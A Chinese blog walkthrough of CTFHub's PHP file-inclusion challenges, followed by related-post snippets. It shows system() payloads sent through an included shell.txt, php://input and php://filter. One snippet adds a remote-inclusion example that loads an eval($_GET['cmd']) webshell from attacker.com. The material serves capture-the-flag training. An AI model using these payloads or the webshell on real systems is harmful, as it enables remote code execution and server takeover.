CTFHUB RCE——文件包含

最新推荐文章于 2025-11-19 20:51:57 发布
原创 最新推荐文章于 2025-11-19 20:51:57 发布 · 8.2k 阅读 · 31 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #php

本文详细介绍了PHP中关于文件包含漏洞的利用方法,包括strpos函数的运用、php://input和php://filter伪协议的解析,以及如何通过这些技巧读取源代码和实现远程包含。在每个例子中,作者展示了如何在限制条件下执行shell命令,查找并获取flag。此外,还探讨了安全设置如allow_url_include的影响。
该文章已生成可运行项目,

 1.文件包含

 首先我们开启题目

 看到的是一大串代码

 我们仔细看一下php代码,重点是

if (!strpos($_GET["file"], "flag")) {
        include $_GET["file"];

这里有一个strpos(string,find,start)函数

意思在string字符串中找find的位置,start是查找的开始位置

那么这句代码的意思就是如果file中没有flag字符串就执行下面的include $_GET["file"]

否则就输出Hacker。

再看一眼shell

 是将ctfhub传的参数用php执行

题目的目的也是让我们执行shell木马那么我们就输入

?file=shell.txt

shell中要传的参数为ctfhub=system("ls");

 接着返回上一级目录,发现flag,接下来打开flag

 找到Flag。

2.php://input

首先进入题目也是先看代码

代码中说如果file 名中六个字符是 “php://” 就执行后面的include函数

这里其实就应该想到的是php://伪协议

php://filterphp://inputphp://filter用于读取源码php://input用于执行php代码

而执行php://input伪协议条件是allow_url_include是On

 

那么我们就开始做题

直接构造file的值为php://input

post参数为<?php system("ls")?>

因为php://input是执行后面的PHP命令所以要写成php代码形式

可以显示出网站的文件

接着返回上一级文件

 找到flag后,cat

 

找到flag

3.读取源代码

首先进入题目看代码

 首先file的前六个字母要是php://

而且也没有木马文件可以用,但是它说flag在 /flag当中

那么我们就用到了php://filter伪协议,它用来用于读取源码

php://filter 参数描述
resource=<要过滤的数据流>必须项。它指定了你要筛选过滤的数据流。
read=<读链的过滤器>可选项。可以设定一个或多个过滤器名称,以管道符(*\*)分隔。
write=<写链的过滤器>可选项。可以设定一个或多个过滤器名称,以管道符(\)分隔。
<; 两个链的过滤器>任何没有以 read=write= 作前缀的筛选器列表会视情况应用于读或写链。

比如php://filter/resource=[文件名]读取文件源码

而它说flag在 /flag当中那么我们直接?file=php://filter/resource=/flag

得到flag

4.远程包含

进入题目

 就说了file当中不能有flag

PHPinfo当中也表明php://input可以用

 那么就和php://input一样了直接找出flag

 

本文章已经生成可运行项目
谨溪
关注
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 1294
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
CTFHubRCE文件包含
cx_sam的博客
08-07 1950
CTF WEB RCE 文件包含
CTFHub RCE通关笔记5:文件包含 远程包含
mooyuan的网络安全博客
09-27 1309
本文详细分析了CTFHubRCE-文件包含关卡的利用方法。通过审计靶场PHP源码,发现开发者错误使用strpos()函数导致安全防护失效,允许包含flag开头的文件。文章介绍了两种攻击方法:1)利用php://input协议执行POST请求中的PHP代码;2)通过构造以flag开头的路径(如flag/../../../flag)绕过黑名单检查。实战演示了如何查看系统目录和读取flag文件内容。文章还指出正确的防护方法应使用strpos()===false进行严格比较,避免类型转换的安全风险。
CTFHub-RCE-文件包含
最新发布
2401_88683072的博客
11-19 251
可能是一个Web Shell,即一个恶意脚本,允许攻击者执行服务器端命令,那么我们可以试试用HackBar传入一个参数?,可以通过GET、POST或COOKIE方式传递,这里我用post方式来传递,输入system('ls');发现含有flag,然后使用cat命令来查看一下flag文件,注意,flag是存在在根目录下的。这告诉我们用get传参传入一个file,如果file中没有flag,那么就执行。5.看到PHP的一句话木马(Web Shell),它使用。的文件,链接文本是"shell",这通常暗示。
攻防_漏洞_文件包含_文件包含漏洞详解
redglare的博客
10-22 4343
文件包含漏洞详解
CTFHUB-RCE-文件包含
u014794539的博客
07-11 496
考点 php伪协议 file协议 分析过程 Shell是这个 使用hackbar 构造Playload传参 http://challenge-deb7e7e0db233e27.sandbox.ctfhub.com:10800/shell.txt ctfhub=system('ls /'); ctfhub=system('cat /flag'); 得到flag ctfhub{3a551fa301f8dda0dccd2c7d} php://input 考点 php伪协议 input协议 分析思路
ctfhub-文件包含
m0_62094846的博客
12-13 379
这道题和之前做的文件包含题不大一样,包含了木马 官方的wp写的很清楚文件包含 | CTFHub GET一个file,用file包含的文件会直接出现在index.php中被当作php代码解析 那么,如果file=shell.txt,就可以把木马包含进文件里了 再用蚁剑就可以连接 ...
ctfhub文件包含
diven2的博客
08-03 320
网上的都是使用hackbar进行扫描,描述的步骤也不太清晰。服务器在设置文件包含函数的时候,函数的参数没有经过过滤或者严格的定义,导致参数可以被用户自行更改,这样用户就可以包含非预知的文件,也就是一些木马或者病毒文件等。不管被包含的文件是什么类型文件,文件内的恶意代码都会被解析并执行。使用PHP写的服务器中文件包含函数有四种,include ,include_once,require,require_once。会造成服务器的网页被篡改,网站被挂马,服务器被远程控制,被安装后门等危险。
CTFHUB——RCE之eval执行和文件包含漏洞
m0_46467017的博客
08-31 6827
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
CTFHUB-WEB-RCE【07】eval执行、文件包含
(∪.∪ )...zzz的博客
06-10 565
!!!坚持eval执行查看根目录文件查看下一级目录cat 命令读取文件文件包含构造playload 传参查看当前目录下文件下一级cat查看信息php://inputphp://input 伪协议相当于一个削弱post的方法抓包消息中<?php system("ls /");?><?php system("cat /flag_26957");?>读取源代码源代码提示flag的位置,并且限制使用伪协议php://filter 任意文件读取远程包含使用php://input 伪协议cat命
ctfhub技能树rce 文件包含
01-07
### CTFHub 技能树中的 RCE文件包含漏洞 #### 关于远程代码执行 (RCE) 在Web应用程序开发过程中,如果开发者未能正确过滤用户输入的数据就将其用于构建命令字符串,则可能导致远程代码执行(RCE)漏洞。例如,在...
CTFHub-RCE_eval执行-wp
z1moq的博客
06-21 518
首先看看RCE是什么 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞 ———.
ctfhub技能树RCE
01-09
### CTFHub平台上RCE(远程代码执行)相关的技能树或学习路径 #### 一、基础概念理解 深入理解和掌握远程代码执行的基础原理,包括但不限于漏洞产生的原因以及常见的触发方式。这不仅限于PHP环境下的`eval()`函数...
CTFHUB文件包含
2201_75447904的博客
04-04 1168
但需要注意的是,由于安全原因,大多数浏览器对file://协议有一些限制,例如不允许跨域访问、限制JavaScript执行等,以防止恶意网站利用file://协议进行攻击。而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。: 如果GET参数'file'以"php://"开头,则直接包含用户指定的文件。
文件包含ctfhub
weixin_43326436的博客
08-06 931
1.进入以后,发现的是 应该可以看到是一段代码,strpos这个函数就是查找相同字符串的位置,在这里就是查找和flag相同的字符串的位置,在下面又发现了一个我又一个链接是shell.txt,怎么使用它吗。点进去链接又是一句php,请求ctfhub意思。 2.因为是文件包含,所以直接构造payload 将?shell.txt构造, 所以直接 看到这个图片,利用火狐中的hackbar postdata 输入 ctfhub=system(‘cat /flag’); (system意思就是输出并返回最后一个sh
文件包含(借助CTFHUB,buuctf)
ndjnddjxn的博客
04-24 1233
定义:使用文件包含函数将文件包起来,直接使用包含文件的代码为了灵活包含文件,将包含的文件设置为变量,通过动态变量来引入需要包含的文件时,用户可对变量值可控而服务器没有对变量值进行合理的校验或者校验被绕过导致的,通常为php语言。00截断属于RCE绕过,遇到00自动停止长度截断包含日志文件包含session二、include 表达式。
CTFHub-web(文件包含)
分享与记录
10-21 2064
文件包含 PHP中的strpos()函数 查找字符串在另一字符串中第一次出现的位置 PHP中的$_REQUEST 预定义的 $_REQUEST 变量包含了 $_GET、$_POST 和 $_COOKIE 的内容 $_REQUEST 变量可用来收集通过 GET 和 POST 方法发送的表单数据 $_REQUEST 变量既可以收集GET方法发送的数据,也可以接受POST方法接受的数据 题目内容: php://input php://input特点如下: 1)、Coentent-Type仅在
CTFHUB--文件包含
2503_91569174的博客
07-29 318
之后使用hacker的post栏进行输出,输入system(”ls“);了解到shell.txt里有病毒代码,可知我们需要用文件包含的方式来对其进行执行。没有发现flag返回上一级目录查看。最后cat /flag。
ctfhub rce 远程包含题目 解题流程
07-19
### CTFHub RCE 远程包含漏洞解题步骤 在CTF比赛中,远程包含(Remote File Inclusion,RFI)漏洞通常是指应用程序动态包含远程服务器上的文件内容,从而导致攻击者可以执行任意代码。以下是针对CTFHubRCE远程包含题目的解题流程和思路。 #### 1. 确认远程包含漏洞的存在 首先需要确认目标应用程序是否存在远程文件包含漏洞。通常可以通过传递一个远程URL作为参数,观察是否能够成功加载并执行远程资源。例如,如果存在类似以下形式的请求: ``` http://challenge-xxx/?page=http://attacker.com/evil.php ``` 则说明可能存在远程包含漏洞。尝试构造类似请求,查看是否能够成功加载外部资源。 #### 2. 构造恶意PHP文件 攻击者需要准备一个恶意PHP文件,用于在目标服务器上执行任意代码。该文件通常包含简单的WebShell代码,例如: ```php <?php eval($_GET['cmd']); ?> ``` 将该文件上传到攻击者控制的服务器上,确保可以通过HTTP访问。 #### 3. 利用远程包含执行代码 将构造好的PHP文件URL作为参数传递给存在漏洞的页面,例如: ``` http://challenge-xxx/?include=http://attacker.com/evil.php ``` 如果成功包含,攻击者可以通过访问类似以下URL执行任意PHP代码: ``` http://challenge-xxx/?include=http://attacker.com/evil.php&cmd=system('ls'); ``` #### 4. 绕过过滤机制 在CTF题目中,往往会对输入进行一定程度的过滤,例如限制协议、过滤特殊字符或限制文件路径。常见的绕过方式包括: - 使用PHP封装协议,如`php://input`或`data://`来绕过文件路径限制。 - 利用空格、特殊字符或编码绕过黑名单限制,例如使用`%0a`(换行符)或`%09`(Tab符)替代空格。 - 使用短标签`<?=`或`<?=system('ls')?>`直接执行命令。 #### 5. 获取Flag 一旦成功执行命令,即可尝试读取服务器上的Flag文件。通常Flag文件位于特定目录下,例如`/flag`或`/var/www/html/flag.txt`。使用命令如: ```php system('cat /flag'); ``` 来获取Flag内容。 #### 6. 综合利用 在部分题目中,可能需要结合多个漏洞点,例如先通过远程包含加载一个WebShell,再通过该WebShell进一步利用本地文件包含(LFI)或命令注入漏洞,最终获取Flag。 ### 示例代码:构造远程包含的WebShell ```php <?php // evil.php eval($_GET['cmd']); ?> ``` 攻击者服务器部署该文件后,通过如下URL触发远程包含: ``` http://challenge-xxx/?include=http://attacker.com/evil.php&cmd=system('cat /flag'); ```
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值